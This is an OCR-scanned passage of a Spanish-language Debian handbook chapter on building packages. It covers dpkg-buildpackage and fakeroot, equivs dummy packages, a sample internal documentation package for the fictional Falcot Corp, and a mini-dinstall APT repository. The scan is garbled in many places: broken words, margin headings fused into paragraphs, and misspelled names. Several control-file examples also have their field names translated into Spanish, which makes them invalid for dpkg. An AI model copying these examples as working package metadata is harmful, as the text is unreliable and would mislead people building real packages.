los  paquetes  mencionados  en  el  campo  Build-Depends  antes  de  poder  finalizar  con  el  paquete 
deseado.  Algunos  paquetes  pueden  no  necesitar  ser  retroadaptados  y  puede  instalarlos  tal  cual 
durante  el  proceso  de  compilacion  (un  ejemplo  notable  es  debhelper).  Sepa  que  el  proceso  de  re- 
troadaptacion  puede  volverse  muy  complejo  rapidamente  si  no  tiene  cuidado.  Por  lo  tanto,  debe 
mantener  al  minimo  las  retroadaptaciones  siempre  que  sea  posible. 


SUGERENCIA 

Instalacion  de  Build- 
Depends 


apt-get  permite  instalar  todos  los  paquetes  mencionados  en  los  campos  Build- 
Depends  de  un  paquete  fuente  disponible  en  una  distribucion  mencionada  en  una 
linea  deb-src  del  archivo  /etc/apt/sources .  list.  Esto  es  simple  cuestion  de 
ejecutar  apt-get  build-dep  paquete- fuente. 
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15.1.3.  Inicio  de  la  recompilacion 


Cuando  aplicamos  los  cambios  necesarios  a  las  fuentes,  podemos  comenzar  la  generacion  del 
paquete  binario  (archivo  .deb).  El  programa  dpkg-buildpackage  gestiona  todo  el  proceso. 


Ejemplo  15.1  Recompilacion  del  paquete 


$  dpkg-buildpackage  -us  -uc 

[.. .] 


HERRAMIENTA  En  esencia,  el  proceso  de  creacion  de  un  paquete  es  simple  cuestion  de  reunir  en  un 
fakeroot  compendio  un  conjunto  de  archivos  existentes  (o  compilados);  en  dicho  compendio 
root  sera  el  dueno  de  la  mayoria  de  los  archivos  del  compendio.  Sin  embargo,  crear 
todo  el  paquete  bajo  este  usuario  aumentaria  los  riesgos;  afortunadamente,  pode¬ 
mos  evitar  esto  con  el  programa  fakeroot.  Podemos  utilizar  esta  herramienta  para 
ejecutar  un  programa  y  darle  la  impresion  que  esta  ejecutando  como  root  y  crea 
archivos  con  permisos  y  duenos  arbitrarios.  Cuando  el  programa  crea  el  compendio 
que  sera  el  paquete  Debian,  se  lo  engana  para  que  cree  un  compendio  con  archi¬ 
vos  con  duenos  arbitrarios,  incluyendo  root.  Esta  configuracion  es  tan  conveniente 
que  dpkg-buildpackage  utiliza  fakeroot  de  forma  predeterminada  cuando  gene¬ 
ra  paquetes. 

Sepa  que  solo  se  engana  al  programa  para  que  «crea»  que  funciona  bajo  una  cuenta 
con  privilegios,  pero  el  proceso  realmente  ejecuta  como  el  usuario  que  ejecuto  fak 
eroot  programa  (y  se  crean  los  archivos  con  los  permisos  de  dicho  usuario).  En 
ningun  momento  realmente  obtiene  privilegios  de  root  que  pueda  abusar. 


El  programa  anterior  puede  fallar  si  no  se  actualizaron  los  campos  Build-Depends  o  si  no  estan 
instalados  los  paquetes  relacionados.  En  tal  caso,  es  posible  evitar  este  chequeo  con  la  opcion  - 
d  de  dpkg-buildpackage.  Sin  embargo,  al  ignorar  explicitamente  estas  dependencias  corre  el 
riesgo  de  que  el  proceso  de  compilacion  falle  en  una  etapa  posterior.  Lo  que  es  peor,  el  paque¬ 
te  puede  parecer  compilar  correctamente  pero  no  ejecutar  correctamente:  algunos  programas 
desactivan  automaticamente  algunas  de  sus  funcionalidades  cuando  una  biblioteca  necesaria 
no  esta  disponible  al  momento  de  compilarlo. 

La  mayoria  de  las  veces,  los  desarrolladores  Debian  utilizan  un  programa  de  alto  nivel  como 
debuild;  este  ejecuta  dpkg-buildpackage  normalmente,  pero  tambien  agrega  una  invocacion 
de  un  programa  que  ejecuta  muchos  chequeos  para  validar  el  paquete  generado  segtin  la  nor- 
mativa  Debian.  Este  script  tambien  limpia  el  entorno  para  que  las  variables  de  entorno  locales 
no  «contaminen»  la  compilacion  del  paquete.  El  programa  debuild  es  una  de  las  herramientas 
de  devscripts,  que  comparte  un  poco  de  consistencia  y  configuracion  para  facilitar  la  tarea  del 
desarrollador. 
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VISTA  RAPIDA  El  programa  pbuilder  (en  el  paquete  del  mismo  nombre)  permite  crear  un  paquete 

pbuilder  Debian  en  un  entorno  chroot.  Primero  crea  un  directorio  temporal  que  contiene  el 

sistema  minimo  necesario  para  crear  el  paquete  (incluyendo  los  paquetes  mencio- 
nados  en  el  campo  Buitd-Depends).  Luego  utiliza  este  directorio  como  raiz  (/)  con 
el  programa  chroot  durante  el  proceso  de  compilacion. 

Esta  herramienta  permite  que  el  proceso  de  compilacion  ocurra  en  un  entorno  que 
no  fue  modificado  por  el  usuario.  Esto  tambien  permite  una  deteccion  rapida  de  las 
dependencias  de  compilacion  faltantes  (ya  que  la  compilacion  fallara  a  menos  que 
las  dependencias  apropiadas  esten  documentadas).  Finalmente,  permite  crear  un 
paquete  para  una  version  de  Debian  que  no  es  la  instalada  en  el  sistema:  el  equipo 
puede  estar  utilizando  Stable  para  su  trabajo  normal,  pero  pbuilder  en  el  mismo 
equipo  puede  utilizar  Unstable  para  compilar  paquetes. 


15.2  Creacion  de  su  primer  paquete 


15.2.1.  Metapaquetes  o  paquetes  falsos 


Los  paquetes  falsos  y  los  metapaquetes  son  similares  en  que  son  cascarones  vacfos  que  solo  exis- 
ten  por  los  efectos  que  tienen  sus  metadatos  en  el  sistema  de  gestion  de  paquetes. 

El  proposito  de  un  paquete  falso  es  enganar  a  dpkg  y  apt  para  que  crean  que  un  paquete  esta 
instalado.  Esto  permite  satisfacer  las  dependencias  de  un  paquete  cuando  se  instalo  el  software 
correspondiente  fuera  del  alcance  del  sistema  de  paquetes.  Este  metodo  funciona,  pero  deberia 
evitarlo  siempre  que  sea  posible  ya  que  no  hay  garantias  que  el  software  instalado  manualmen- 
te  se  comporta  exactamente  de  la  misma  forma  que  el  paquete  correspondiente  y  que  otros 
paquetes  que  dependan  de  el  funcionaran  correctamente. 

Por  el  otro  lado,  un  metapaquete  existe  principalmetne  como  una  coleccion  de  dependencias, 
para  que  su  instalacion  incluya  un  conjunto  de  otros  paquetes  en  un  solo  paso. 

Puede  crear  ambos  tipos  de  paquetes  con  los  programas  equivs- control  y  equivs- build  (en 
el  paquete  equivs).  Si  ejecuta  equivs-control  archivo  creara  un  archivo  de  cabecera  de  un 
paquete  Debian  que  debe  editar  para  que  contenga  el  nombre  esperado  del  paquete,  su  numero 
de  version,  el  nombre  de  su  encargado,  sus  dependencias  y  su  descripcion.  Puede  eliminar  todos 
los  demas  campos  sin  un  valor  predeterminado  ya  que  son  opcionales.  Los  campos  Copyright, 
Changelog,  Readme  y  Extra-Files  no  son  campos  estandar  en  los  paquetes  Debian,  solo  tienen 
sentido  dentro  del  alcance  de  equivs  -  build  y  no  seran  mantenidos  en  las  cabeceras  del  paquete 
generado. 
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Ejemplo  15.2  Archivo  de  cabecera  del  paquete  falso  libxml  libxml  perl 


Seccion:  perl 
Prioridad:  optional 
Version-Standards:  3.9.6 

Paquete:  libxml-libxml-perl 
Version:  2.0116-1 

Maintainer:  Raphael  Hertzog  <hertzog@debian ,org> 

Dependencias :  libxml2  (>=  2.7.4) 

Arquitectura :  all 

Description:  Paquete  falso  -  modulo  instalado  manualmente  en  siteperl 
Se  trata  de  un  paquete  falso  que  hace  creer  al  sistema  de 
empaquetado  que  este  paquete  Debian  esta  instalado. 

De  hecho,  el  paquete  no  se  instala  si  una  version  mas  moderna 
del  modulo  se  ha  compilado  manualmente  e  instalado  en  el 
directorio  siteperl. 


EL  siguiente  paso  es  generar  el  paquete  Debian  ejecutando  equivs- build  archivo.  Voila:  se 
creo  el  paquete  en  el  directorio  actual  y  lo  puede  utilizar  como  cualquier  otro  paquete  Debian. 


15.2.2.  Simple  compendio  de  archivos 

Los  administradores  de  Lalcot  Corp  necesitaron  crear  un  paquete  Debian  para  facilitar  el  desplie- 
gue  de  un  conjunto  de  documentos  en  una  gran  cantidad  de  equipos.  El  administrador  a  cargo  de 
esta  tarea  primero  leyo  la  «Guia  del  nuevo  desarrollador  de  Debian»  y  luego  comenzo  a  trabajar 
en  su  primer  paquete. 

https : //www. debian . org/doc/manuals/maint -guide/ 

El  primer  paso  es  crear  un  directorio  falcot- data  - 1 . 0  que  contendra  el  paquete  fuente  obje- 
tivo.  El  paquete,  logicamente,  se  llamara  falcot-datay  tendra  el  numero  de  version  1.0.  El  admi¬ 
nistrador  luego  ubicara  los  archivos  de  documentos  en  un  subdirectorio  data.  Luego  ejecutara 
dh_make  (del  paquete  dh-make )  para  agregar  los  archivos  necesarios  para  el  proceso  de  genera- 
cion  del  paquete,  que  seran  almacenados  en  un  subdirectorio  debian: 

$  cd  falcot-data-1 . 0 
$  dh_make  --native 

Type  of  package:  single  binary,  indep  binary,  multiple  binary,  library,  kernel  module 
,  kernel  patch? 

[s/i/m/l/k/n]  i 

Maintainer  name  :  Raphael  Hertzog 
Email-Address  :  hertzog@debian.org 
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Date  :  Fri,  04  Sep  2015  12:09:39  -0400 

Package  Name  :  falcot-data 

Version  :  1.0 

License  :  gpl3 

Type  of  Package  :  Independent 

Hit  <enter>  to  confirm: 

Currently  there  is  no  top  level  Makefile.  This  may  reguire  additional  tuning. 
Done.  Please  edit  the  files  in  the  debian/  subdirectory  now.  You  should  also 
check  that  the  falcot-data  Makefiles  install  into  $DESTDIR  and  not  in  /  . 

$ 


El  tipo  de  paquete  seleccionado  ( binario  independiente :  «indep  binary»)  indica  que  este  paquete 
fuente  generara  solo  un  paquete  binario  que  puede  ser  compartido  entre  todas  las  arquitectu- 
ras  (Architecture:all.  Binario  unico  («single  binary»)  es  lo  contrario  y  generara  solo  un  paquete 
binario  que  depende  de  la  arquitectura  objetivo  (Architecture:any).  En  este  caso,  esta  primera 
opcion  es  la  mas  relevante,  ya  que  el  paquete  solo  contiene  documentos  y  ningun  programa 
binario,  por  lo  que  se  lo  puede  utilizar  de  la  misma  forma  en  equipos  de  cualquier  arquitectura. 

El  tipo  binario  multiple  («multiple  binary»)  corresponde  a  un  paquete  fuente  que  generara  varios 
paquetes  binarios.  Un  caso  particular,  biblioteca  («library»),  es  util  para  bibliotecas  compartidas 
ya  que  necesitan  seguir  reglas  de  empaquetado  estrictas.  De  forma  similar,  deberia  restringir  el 
uso  de  modulo  de  nucleo  («kernel  module»)  o  parche  del  nucleo  («kernel  patch»)  a  paquetes  que 
contengan  modulos  de  nucleo. 


SUGERENCIA  La  mayoria  de  los  programas  involucrados  al  mantener  paquetes  buscaran  su  nom- 

Nombre  y  direccion  de  bre  V  d i reccion  de  correo  en  las  variables  de  entorno  DEBFULLNAME  y  DEBEMAIL  o 
correo  del  encargado  EMAIL.  Definirlas  de  una  vez  y  para  siempre  le  evitara  tener  que  ingresarlas  varias 
veces.  Si  su  consola  usual  es  bash,  es  simple  cuestion  de  agregar  las  siguientes  dos 
lineas  a  su  archivo  -/  .  bashrc  (jobviamente  reemplazara  los  valores  con  unos  mas 
relevantesl): 

export  EMAIL="hertzog@debian . org" 
export  DEBFULLNAME="Raphael  Hertzog" 


El  programa  dh_make  crea  un  subdirectorio  debian  con  muchos  archivos.  Algunos  son  necesa- 
rios,  en  particular  rules,  control,  changelog  y  copyright.  Los  archivos  con  extension  .  ex  son 
archivos  de  ejemplo  que  puede  utilizar  modificandolos  (y  eliminando  la  extension)  cuando  ne- 
cesite.  Si  no  los  necesita,  le  recomendamos  eliminarlos.  Debe  mantener  el  archivo  compat  ya 
que  es  necesario  para  que  funcione  correctamente  la  suite  de  programas  debhelper  (todos  los 
que  comienzan  con  el  prefijo  dh_)  que  son  utilizados  en  varias  etapas  del  proceso  de  creacion 
del  paquete. 

El  archivo  copyright  debe  contener  la  informacion  sobre  los  autores  de  los  documentos  inclui- 
dos  en  el  paquete  y  las  licencias  relacionadas.  En  nuestro  caso,  estos  son  documentos  internos  y 
su  uso  esta  restringido  a  la  empresa  Falcot  Corp.  El  archivo  changelog  predeterminado  general- 
mente  es  el  apropiado;  Es  sufuciente  reemplazar  «Initial  release»  con  una  explicacion  mas  deta- 
lladay  cambiarladistribucion  de  unstable  a  internal.  Tambiense  actualizo  el  archivo  control:  se 
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modified  el  campo  Seccion  a  raise y  se  eliminaron  los  campos  Homepage,  Vcs-Git  y  Vcs-Browser. 
Se  completaron  los  campos  de  Depends  con  iceweasel  |  www-browser  para  asegurar  que  exista 
un  navegador  web  disponible  capaz  de  mostrar  los  documentos  en  el  paquete. 


Ejemplo  15.3  El  archivo  control 


Source:  falcot-data 
Section:  misc 
Priority:  optional 

Maintainer:  Raphael  Hertzog  <hertzog@debian ,org> 

Build-Depends:  debhelper  (>=  9) 

Standards-Version :  3.9.5 

Paquate:  falcot-data 
Arquitectura :  all 

Dependencias :  iceweasel  |  www-browser,  ${misc : Depends} 

Descripcion:  Documentacion  interna  de  Falcot  Corp 
Este  paquete  proporciona  varios  documentos  que  decriben  la  estructura 
interna  de  Falcot  Corp.  Incluye: 

-  diagrama  de  la  organizacion 

-  contactos  para  cada  departamento . 

Estos  documentos  NO  DEBEN  salir  de  la  empresa. 

Solo  para  USO  INTERNO. 


Ejemplo  15.4  El  archivo  changelog 


falcot-data  (1.0)  internal;  urgency=low 

*  Entrega  inicial. 

*  Empecemos  con  unos  pocos  documentos: 

-  estructura  interna  de  la  compania; 

-  contactos  para  cada  departamento. 

--  Raphael  Hertzog  <hertzog@debian . org>  Fri,  04  Sep  2015  12:09:39  -0400 


Ejemplo  15.5  El  archivo  copyright 


Formato:  http : //www. debian . org/doc/pac kaging -manuals/ copy  right -forma t/1 . 0/ 
Upstream-Name:  falcot-data 

Ficheros:  * 

Copyright:  2004-2015  Falcot  Corp 
Licencia : 

Todos  los  derechos  reservados. 
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VOLVER  A  LOS  CIMIENTOS  Un  archivo  Makefile  es  un  script  utilizado  por  el  programa  make;  describe  las  reglas 

El  archivo  Makefile  Para  crear  un  conjunto  de  archivos  desde  otros  en  un  arbol  de  dependencias  (por 

ejemplo,  podemos  compilar  un  programa  desde  un  conjunto  de  archivos  fuente).  El 
archivo  Makefile  describe  estas  reglas  en  el  siguiente  formato: 

objetivo:  fuentel  fuente  2  ... 
ordenl 
orden2 

La  interpretation  de  esta  regia  es  como  sigue:  si  uno  de  los  archivos  fuente*  es 
mas  reciente  que  el  archivo  objetivo,  entonces  es  necesario  generar  el  objetivo 
utilizando  ordenl  y  orden2. 

Sepa  que  las  Ifneas  de  ordenes  deben  comenzar  con  un  caracter  de  tabulacion;  tam- 
bien  debe  saber  que  cuando  una  linea  de  ordenes  comienza  con  un  caracater  de 
guion  (-),  si  este  falla  no  interrumpira  todo  el  proceso. 


El  archivo  rules  generalmente  contiene  un  conjunto  de  reglas  utilizadas  para  configurar,  com¬ 
pilar  e  instalar  el  software  en  un  subdirectorio  dedicado  (cuyo  nombre  coincide  con  el  del  pa- 
quete  binario  generado).  Luego  se  incluye  el  contenido  de  este  subdirectorio  en  el  compendio 
del  paquete  Debian  como  si  fuera  la  raiz  del  sistema  de  archivos.  En  nuestro  caso,  se  instalaran 
los  archivos  en  el  subdirectorio  debian/falcot- data/us r/share/falcot- data/  para  que  el 
paquete  generado  despliegue  los  archivos  en  /  us  r/share/falcot  -data/.  Se  utiliza  el  archivo 
rules  como  si  fuera  un  archivo  Makefile,  con  unos  pocos  objetivos  estandar  (incluyendo  clean 
y  binary,  utilizados  para  limpiar  el  directorio  fuente  y  generar  el  paquete  binario  respectiva- 
mente). 

Si  bien  este  archivo  es  el  corazon  del  proceso,  cada  vez  mas  contiene  solo  el  minimo  indispensa¬ 
ble  para  ejecutar  un  conjunto  estandar  de  programas  que  provee  la  herramienta  debhelper. 
Tal  es  el  caso  de  los  archivos  generados  por  dh_make.  Para  instalar  nuestros  archivos  sim- 
plemente  configurariamos  el  comportamiento  de  dh_install  creando  el  siguiente  archivo 
debian/falcot -data. ins tall: 


data/*  usr/share/falcot-data/ 


En  este  punto,  podemos  crear  el  paquete.  Sin  embargo,  agregaremos  una  capa  de  pintura.  De- 
bido  a  que  los  administradores  desean  que  se  pueda  acceder  facilmente  a  los  documentos 
desde  los  menu  de  los  entornos  graficos  de  escritorio,  anadiremos  un  fichero  falcot-data. 
desktop  y  lo  instalaremos  en  /us r/sha re/applications  agregando  una  segunda  linea  a 
debian/falcot -data. ins tall. 
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Ejemplo  15.6  El  archivo  falcot-data .  desktop 


[Desktop  Entry] 

Name=Documentacionn  Interna  Falcot  Corp 
Comment=Inicia  un  navegador  para  leer  la  documentacion 
Exec=x -www- browser  /us r/share/falcot- data/index. html 
Te rminal=false 
Type=Application 
Categories=Documentation ; 

El  debian/falcot- data  .install  actualizado  se  parece  a  este: 

data/*  usr/share/falcot-data/ 

falcot-data . desktop  us r/sha re/applications/ 

Ahora  nuestro  paquete  fuente  esta  listo.  Todo  lo  que  falta  es  generar  el  paquete  binario  con  el 
mismo  metodo  que  utilizamos  para  recompilar  paquetes:  ejecutaremos  dpkg-buildpackage  - 
us  -uc  desde  el  directorio  falcot-data  - 1. 0. 


15.3.  Creacion  de  un  repositorio  de  paquetes  para  APT 

Falcot  Corp  gradualmente  comenzo  a  mantener  una  cantidad  de  paquetes  Debian  con  modifi- 
caciones  locales  de  paquetes  existentes  o  creados  desde  cero  para  distribuir  datos  y  programas 
internos. 

Para  facilitar  su  despliegue,  desean  integrarlos  en  un  repositorio  de  paquetes  que  APT  pueda 
utilizar  directamente.  Por  razones  de  mantenimiento  obvias,  desean  separar  los  paquetes  inter¬ 
nos  de  aquellos  recompilados  localmente.  El  objetivo  es  que  los  elementos  correspondientes  del 
archivo  /etc/apt/sou  rces  .  list .  d/f  alcot .  list  sean  los  siguientes: 

deb  http://packages.falcot.com/  updates/ 
deb  http://packages.falcot.com/  internal/ 

Por  lo  tanto,  los  administradores  configuraron  un  servidor  virtual  en  su  servidor  HTTP  interno, 
con  /srv/vhosts/packages/  como  raiz  del  espacio  web  asociado.  Delegaron  la  gestion  del  re¬ 
positorio  en  si  al  programa  mini -din stall  (en  el  paquete  del  mismo  nombre).  Esta  herramien- 
ta  revisa  el  directorio  incoming/  (en  nuestro  caso:  /srv/vhosts/packages/mini-dinstall/ 
incoming)  y  espera  alii  a  los  nuevos  paquetes;  cuando  se  sube  un  paquete,  lo  instala  en  un  repo¬ 
sitorio  en  /srv/hosts/packages/.  El  programa  mini-dinstall  lee  el  archivo  * .  changes  crea- 
do  cuando  se  genera  el  paquete  Debian.  Estos  archivos  contienen  una  lista  de  todos  los  otros 
archivos  asociados  con  la  version  del  paquete  (*.deb,  *.dsc,  *.diff  .  gz/*. debian.  tar. gz, 
* .  o  rig  .  ta  r .  gz  o  sus  equivalentes  con  otras  herramientas  de  compresion)  que  le  permiten  a 
mini-dinstall  saber  que  archivos  instalar.  Los  archivos  * .  changes  tambien  contienen  el  nom¬ 
bre  de  la  distribucion  objetivo  (generalmente  unstable)  mencionada  en  el  ultimo  campo  de  la 
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entrada  en  debian/changelog  y  mini-dinstall  utiliza  esta  informacion  para  decidir  donde 
instalar  el  paquete.  Es  por  esto  que  los  administradores  siempre  deben  cambiar  este  campo  an¬ 
tes  de  compilar  un  paquete  y  definirlo  como  internal  o  updates,  dependiendo  de  la  ubicacion 
objetivo.  mini-dinstall  generara  luego  los  archivos  necesarios  para  APT,  como  Packages  .gz. 


ALTERNATIVA  Si  mini  -  dinstall  le  parece  demasiado  complejo  para  sus  necesidades  de  reposi- 
apt-ftparchive  torios  Debian,  tambien  puede  utilizar  el  programa  apt-ftparchive.  Esta  herra- 
mienta  explora  el  contenido  de  un  directorio  y  muestra  (por  su  salida  estandar) 
el  archivo  Packages  correspondiente.  En  el  caso  de  Falcot  Corp,  los  administrado¬ 
res  pueden  subir  sus  paquetes  directamente  a  /srv/vhosts/packages/updates/ 
o  /srv/vhosts/packages/internal/  y  luego  ejecutar  lo  siguiente  para  crear  los 
archivos  Pacakges .  gz: 

$  cd  /srv/vhosts/packages 

$  apt-ftparchive  packages  updates  >updates/Packages 
$  gzip  updates/Packages 

$  apt-ftparchive  packages  internal  >internal/Packages 
$  gzip  internal/Packages 

Ejecutar  apt-ftparchive  sources  permite  crear  archivos  Sources .  gz  de  forma 
similar. 


La  configuracion  de  mini-dinstall  necesita  definir  un  archivo  -/ . mini-dinstall .  conf;  en 
el  caso  de  Falcot  Corp,  su  contenido  es  el  siguiente: 

[DEFAULT] 

archivestyle  =  flat 
archivedir  =  /srv/vhosts/packages 

verifysigs  =  0 

mailto  =  admin@falcot.com 

generate  release  =  1 
release  origin  =  Falcot  Corp 
releasecodename  =  stable 

[updates] 

releaselabel  =  Paquetes  Debian  Recompilados 
[internal] 

releaselabel  =  Paquetes  Internos 

Una  decision  importante  es  la  generacion  de  archivos  Release  para  cada  repositorio.  Esto  puede 
ayudar  a  gestionar  las  prioridades  de  instalacion  utilizando  el  archivo  de  configuracion  /etc/ 
apt/p  references  (revise  el  Seccion  6.2.5,  «Gestion  de  prioridades  de  los  paquetes»  pagina  118 
para  mas  detalles). 
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SEGURIDAD  Debido  a  que  se  diseno  a  mini-dinstall  para  ejecutar  como  un  usuario  normal, 
mini-dinstall  y  permisos  110  es  necesar'°  ejecutarlo  como  root.  La  forma  mas  sencilla  es  configurar  todo  en  la 

cuenta  de  usuario  que  pertenezca  al  administrador  encargado  de  crear  los  paquetes 
Debian.  Debido  a  que  solo  este  administrador  tiene  los  permisos  necesarios  para 
guardar  archivos  en  el  directorio  incoming/  podemos  deducir  que  este  autentico  el 
origen  de  cada  paquetes  antes  de  desplegarlo  y  mini-dinstall  no  necesita  hacer- 
lo  nuevamente.  Esto  explica  el  parametros  verify  sigs  =0  (que  significa  que  no 
se  necesita  verificar  firmas).  Sin  embargo,  si  el  contenido  del  paquete  es  sensible, 
podemos  revertir  esta  configuracion  y  seleccionar  autenticar  con  un  conjunto  de 
Haves  que  contenga  aquellas  de  las  personas  que  tienen  permitido  crear  paquetes 
(configurado  con  el  parametro  ext  rakey  rings);  mini-dinstall  luego  verifica- 
ra  el  origen  de  cada  paquete  entrante  analizando  la  firma  integrada  en  el  archivo 
* .  changes. 


Ejecutar  mini-dinstall  en  realidad  inicia  un  demonio  en  segundo  piano.  Mientras  ejecute 
el  demonio,  revisara  el  directorio  incoming/  por  nuevos  paquetes  cada  media  hora;  cuando 
detecte  un  nuevo  paquete  lo  movera  al  repositorio  y  generara  los  archivos  Packages. gz  y 
Sources.gz.  Si  ejecutar  un  demonio  es  un  problema,  tambien  puede  invocar  manualmente 
mini-dinstall  en  modo  de  lote  (con  la  opcion  -b)  cada  vez  que  suba  un  paquete  al  directorio 
incoming/,  mini-dinstall  permite  otras  posibilidades  documentadas  en  su  pagina  de  manual 
mini-dinstall(l). 


EXTRA  La  suite  APT  verifica  una  cadena  de  firmas  criptograficas  en  los  paquetes  que  ges- 
Generacion  de  un  ti°na  antes  de  instalarlos  para  asegurar  su  autenticidad  (ver  Seccion  6.5,  «Compro- 
repositorio  firmado  bacion  de  la  autenticidad  de  un  paquete»  pagina  128).  Por  lo  tanto,  los  repositories 
APT  privados  pueden  ser  un  problema,  ya  que  los  equipos  que  los  utilicen  mostra- 
ran  advertencias  sobre  paquetes  sin  firmar.  Por  lo  tanto,  un  administrador  diligente 
integrara  los  archivos  privados  con  el  mecanismo  de  seguridad  de  APT. 

Para  ayudar  con  este  proceso,  mini-dinstall  incluye  la  opcion  de  configuracion 
release  signscript  que  permite  especificar  un  script  a  utilizar  para  generar  la  fir¬ 
ma.  Un  buen  punto  de  partida  es  el  script  sign  -  release .  sh,  provisto  por  el  paque¬ 
te  mini-dinstail,  en  el  directorio  /us  r/sha  re/doc/mini  -  dinstall/examples/; 
puede  necesitar  cambios  locales. 


15.4.  Como  convertirse  en  un  encargado  de  paquetes 

15.4.1.  Aprendizaje  de  creacion  de  paquetes 

Crear  un  paquete  Debian  de  calidad  no  siempre  es  una  tarea  sencilla  y  necesitara  aprender  algu- 
nas  cosas  para  convertirse  en  un  encargado  de  paquetes  («package  mantainer»),  tanto  teoricas 
como  practicas.  No  es  solo  cuestion  de  compilar  e  instalar  software;  en  cambio,  la  mayor  parte 
de  la  complejidad  proviene  de  entender  problemas,  conflictos  y,  en  general,  las  interacciones 
con  los  muchos  otros  paquetes  disponibles. 
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Reglas 


Un  paquete  Debian  debe  cumplir  con  las  reglas  precisas  agrupadas  en  la  normativa  Debian,  y 
todo  encargado  de  paquetes  debe  conocerlas.  No  hay  necesidad  de  saberlas  de  memoria,  sino 
saber  que  existeny  consul tarlas  cuando  se  enfrente  ante  alternativas  no  triviales.  Todo  encar¬ 
gado  Debian  ha  cometido  errores  por  no  conocer  alguna  regia,  pero  esto  no  es  un  gran  problema 
siempre  y  cuando  se  corrija  cuando  un  usuario  informe  del  error  como  (lo  que  sucede  bastante 
rapido  gracias  a  usuarios  avanzados). 

+  https : //www. debian . org/doc/debian -  policy/ 


Procedimientos 

Debian  no  es  una  simple  coleccion  de  paquetes  individuales.  El  trabajo  de  empaquetado  de  to- 
dos  es  parte  de  un  proyecto  colectivo;  ser  un  desarrollador  Debian  incluye  saber  como  funcio- 
na  el  proyecto  Debian  como  un  todo.  Todo  desarrollador,  tarde  o  temprano,  interactuara  con 
otros.  La  referencia  de  desarrolladores  de  Debian  («Debian  Developer’s  Reference)),  en  el  paque¬ 
te  developers-reference)  resume  lo  que  todo  desarrollador  debe  saber  para  poder  interactuar  de 
la  mejor  forma  posible  con  los  varios  equipos  dentro  del  proyecto  y  para  poder  aprovechar  al 
maximo  los  recursos  disponibles.  Este  documento  tambien  enumera  una  serie  de  deberes  que 
se  espera  cumpla  un  desarrollador. 

•-  https : //www. debian . org/doc/manual s/developers- reference/ 


Herramientas 

Muchas  herramientas  ayudan  a  los  encargados  de  paquetes  con  su  trabajo.  Esta  seccion  las  des¬ 
cribe  rapidamente,  pero  no  provee  todos  sus  detalles,  ya  que  cada  una  de  ellas  cuenta  con  su 
propia  documentacion. 


El  programa  lintian  Esta  herramienta  es  una  de  las  mas  importantes:  es  el  verificador  de 
paquetes  Debian.  Esta  basado  en  un  gran  conjunto  de  pruebas  creadas  a  partir  de  la  normativa 
Debian,  y  detecta  rapida  y  automaticamente  muchos  errores  que  pueden  corregirse  antes  de 
publicar  los  paquetes. 

Esta  herramienta  es  solo  una  ayuda  y  a  veces  esta  equivocada  (por  ejemplo,  como  la  normativa 
Debian  cambia  con  el  tiempo,  lintian  a  veces  esta  desactualizado).  No  es  exhaustiva:  no  debe 
interpretar  el  no  obtener  ningun  error  Lintian  como  prueba  de  que  el  paquete  es  perfecto;  como 
maximo,  este  evita  los  errores  mas  comunes. 


El  programa  piuparts  Esta  es  otra  herramienta  importante:  automatiza  la  instalacion,  ac- 
tualizacion,  eliminacion  y  purga  de  un  paquete  (en  un  entorno  aislado)  y  revisa  que  ninguna  de 
estas  operaciones  genere  un  error.  Puede  ayudar  a  detectar  dependencias  faltantes  y  tambien 
detecta  cuando  un  archivo  no  elimina  archivos  que  deberia  luego  de  ser  purgado. 
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devscripts  El  paquete  devscripts  contiene  muchos  programa  que  ayudan  en  un  gran  espectro 
del  trabajo  de  un  desarrollador  Debian: 

■  debuild  permite  generar  un  paquete  (con  dpkg  -buildpackage)y  ejecutar  lintian  para 
verificar  si  cumple  con  la  normativa  Debian  luego. 

■  debclean  limpia  un  paquete  fuente  luego  que  se  genero  un  paquete  binario. 

■  dch  permite  editar  rapiday  facilmente  el  archivo  debian/changelog  enun  paquete  fuen¬ 
te. 

■  u  s  c a n  verifica  si  el  autor  original  publico  una  nueva  version  de  un  software;  esto  necesita 
un  archivo  debian/watch  con  una  descripcion  de  la  ubicacion  de  dichas  publicaciones. 

■  debi  permite  instalar  (con  dpkg  -  i)  el  paquete  Debian  que  acaba  de  generar  sin  necesidad 
de  introducir  su  nombre  y  ruta  completos. 

■  De  forma  similar,  debc  le  permite  escanear  el  contenido  de  un  paquete  generado  recien- 
temente  (con  dpkg  -  c)  sin  tener  que  ingresar  su  nombre  y  ruta  completos. 

■  bt  s  controla  el  sistema  de  seguimiento  de  errores  desde  la  consola;  este  programa  genera 
los  correos  apropiados  automaticamente. 

■  deb  release  sube  un  paquete  recientemente  generado  a  un  servidor  remoto  sin  tener  que 
ingresar  el  nombre  y  ruta  completos  del  archivo  .  changes  relacionado. 

■  debsign  firma  los  archivos  *  .dsc  y  * .  changes. 

■  uupdate  automatiza  la  creacion  de  una  nueva  revision  de  un  paquete  cuando  se  publico 
una  nueva  version  del  software  original. 


debhelper  y  dh-make  Debhelper  es  un  conjunto  de  scripts  que  facilitan  la  creacion  de  paque- 
tes  que  cumplan  la  normativa;  debe  ejecutar  estos  scripts  desde  debian/ rules.  Debhelper  fue 
ampliamente  adopado  en  Debian,  como  muestra  el  hecho  de  que  es  utilizado  en  la  mayorfa  de 
los  paquetes  Debian  oficiales.  Todos  los  programas  que  contiene  tienen  un  prefijo  dh_. 

El  script  dh_make  (en  el  paquete  dh-make )  crea  los  archivos  necesarios  para  generar  un  paque¬ 
te  Debian  en  un  directorio  que  contiene  inicialmente  las  fuentes  de  un  software.  Como  puede 
adivinar  del  nombre  del  programa,  los  archivos  generados  utilizan  debhelper  de  forma  prede- 
terminada. 


dupload  y  dput  Los  programas  dupload  y  dput  permiten  subir  un  paquete  Debian  a  un  servi¬ 
dor  (posiblemente  remoto).  Esto  permite  a  los  desarrolladores  publicar  sus  paquetes  al  servidor 
Debian  principal  (ftp-master.debian.org)  para  que  pueda  ser  integrado  al  repositorio  y  distribui- 
do  por  sus  replicas.  Estos  programas  toman  como  parametros  un  archivo  *.changesy  deducen 
los  demas  archivos  relevantes  de  su  contenido. 
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15.4.2.  Proceso  de  aceptacion 


Convertirse  en  un  ’’desarrollador  Debian”  no  es  una  simple  cuestion  administrativa.  El  proceso 
tiene  varios  pasos,  y  se  parece  tanto  a  una  iniciacion  como  a  un  proceso  de  seleccion.  En  cual- 
quier  caso,  esta  formalizado  y  bien  documentado,  por  lo  que  cualquiera  puede  seguir  su  progreso 
en  el  sitio  web  dedicado  al  proceso  para  nuevos  miembros. 

+  https://nm.debian.org/ 


